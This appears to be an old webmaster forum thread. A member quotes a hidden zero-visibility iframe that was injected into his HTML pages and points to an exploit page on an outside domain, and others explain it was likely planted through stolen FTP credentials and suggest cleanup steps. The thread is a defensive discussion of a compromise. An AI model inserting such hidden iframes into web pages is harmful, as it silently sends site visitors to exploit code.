Greenguy's Board


Go Back   Greenguy's Board > General Business Knowledge
Register FAQ Calendar Today's Posts

Reply
 
Thread Tools Search this Thread Rate Thread Display Modes
Old 2006-11-20, 11:57 AM   #1
noooze
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
 
Join Date: Aug 2003
Location: aarhus - denmark
Posts: 155
Send a message via ICQ to noooze
Ever seen spyware that adds itself to html on your computer ?

found this in some html that i have NOT added myself

i know i had some spyware for a few days untill i removed it

this was the line added

</body><IFRAME name="StatPage" src="hxxxxxp://worldwideweb.xuiputalo.com/new_sploit/index.php" width=5 height=5 style="display:none"></IFRAME>

what the **** - have you ever seen this before ?
__________________
The godess of fortune have never smiled at me - but she has often had a good laugh
noooze is offline   Reply With Quote
Old 2006-11-20, 12:22 PM   #2
atariFu
Aw, Dad, you've done a lot of great things, but you're a very old man, and old people are useless
 
Join Date: Aug 2005
Posts: 25
Send a message via ICQ to atariFu
Thats a nifty trick, probably not new but still interesting. How many html files did it get?
__________________
Atari
www.turbothumbz.com
Porn Search Engine [-_\]
atariFu is offline   Reply With Quote
Old 2006-11-20, 12:25 PM   #3
noooze
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
 
Join Date: Aug 2003
Location: aarhus - denmark
Posts: 155
Send a message via ICQ to noooze
2 pages - and i didnt notice due to a popup blocker - good thing it wasnt online for long.

think it adds itself as you save and close
__________________
The godess of fortune have never smiled at me - but she has often had a good laugh
noooze is offline   Reply With Quote
Old 2006-11-20, 12:50 PM   #4
Toby
Lonewolf Internet Sales
 
Toby's Avatar
 
Join Date: Mar 2005
Location: Houston
Posts: 4,826
Send a message via ICQ to Toby
It's most likely being added at the server, not by your PC.
Toby is offline   Reply With Quote
Old 2006-11-20, 12:54 PM   #5
cd34
a.k.a. Sparky
 
cd34's Avatar
 
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
That was added through FTP access to your webserver.

Very common. Your password has been leaked somewhere, perhaps through spyware/keyloggers, or, a vendor that you have given the password to which installed software, and you never changed the password after they were done.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
cd34 is offline   Reply With Quote
Old 2006-11-20, 02:12 PM   #6
amadman
I've been mad for fucking years, absolutely years, been over the edge for yonks....
 
amadman's Avatar
 
Join Date: Apr 2003
Location: padded room
Posts: 861
Yeah... this sucks.
Had it happen to me not long ago. (Thanks for the help Sparky!)

Change your password!
amadman is offline   Reply With Quote
Old 2006-11-20, 02:32 PM   #7
Beaver Bob
Porn Blog Addict
 
Beaver Bob's Avatar
 
Join Date: Oct 2005
Location: Las Vegas, Nevada
Posts: 715
Send a message via ICQ to Beaver Bob
for security, its always best to change your passwords frequently.. every month or two at least.
Beaver Bob is offline   Reply With Quote
Old 2006-11-20, 02:58 PM   #8
noooze
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
 
Join Date: Aug 2003
Location: aarhus - denmark
Posts: 155
Send a message via ICQ to noooze
damn... so someone downloaded my index pages and uploaded them again ?

hmm i'd better change password , go though ftp log, and talk to the police one good thing is that i can report it, and if the same ip turns up serveral places, someone might wanna do something about it
__________________
The godess of fortune have never smiled at me - but she has often had a good laugh
noooze is offline   Reply With Quote
Old 2006-11-20, 03:52 PM   #9
WebairVictor
Rock stars ... is there anything they don't know?
 
Join Date: Nov 2006
Posts: 14
Send a message via ICQ to WebairVictor Send a message via AIM to WebairVictor
too many of them there...
__________________
The Best Hosting at http://www.webair.com Email: sales@webair.com
WebairVictor is offline   Reply With Quote
Old 2006-11-20, 03:55 PM   #10
noooze
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
 
Join Date: Aug 2003
Location: aarhus - denmark
Posts: 155
Send a message via ICQ to noooze
well... sometimes i cant help think - why not try to fight back.. maybe i cant do anything, but what if 2000 like me report it ?

i donno
__________________
The godess of fortune have never smiled at me - but she has often had a good laugh
noooze is offline   Reply With Quote
Old 2006-11-20, 10:57 PM   #11
juggernaut
Registered User
 
juggernaut's Avatar
 
Join Date: Apr 2005
Location: Central Jersey! If I was rich and powerful I would dress as my avatar does.
Posts: 1,448
Send a message via Yahoo to juggernaut
Quote:
Originally Posted by noooze View Post
well... sometimes i cant help think - why not try to fight back.. maybe i cant do anything, but what if 2000 like me report it ?

i donno
Unfortunatly nothing is going to happen. Ever try and send a email to a "report at com" addy. It goes no place. 1) most people don't even know how to set up multible profiles to check that mail at all time while checking their own. 2) they prob get so filled with mail why would they want to.
Cd will attest that most of this stuff happens when a server admin or host is either sleeping at the wheel and not updating their shit. Not knoweldgeble enough (there are plently running very strong business who can't even spell server let alone manage one correctly). Or just not keeping up to date with the bad guys out there.
In order to change your site someone needs to have write access to the file/folder and that is not to easy to get if the servers permissions are correct and system updated (MS or LX). Or you just give out your password, write it on the bottom of your favor coffee mug or do what most people do and just stick it right on the monitor with a post it note.
If it were me I would be happy of the easy fix. Do a search and replace on the code of all your files. Look over the logs for shits and giggles and block the IP. But fact is they will keep comming from some other place so that is kind of a waste but still a good practice and can't hurt. Me I block all countries that have mostly low to no income. You know the odds of the person comming to your site and paying with their own creditcard is slim. My cam site is open to the world as most of the girls come from countries I would love to block.
juggernaut is offline   Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 12:21 PM.


Mark Read
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc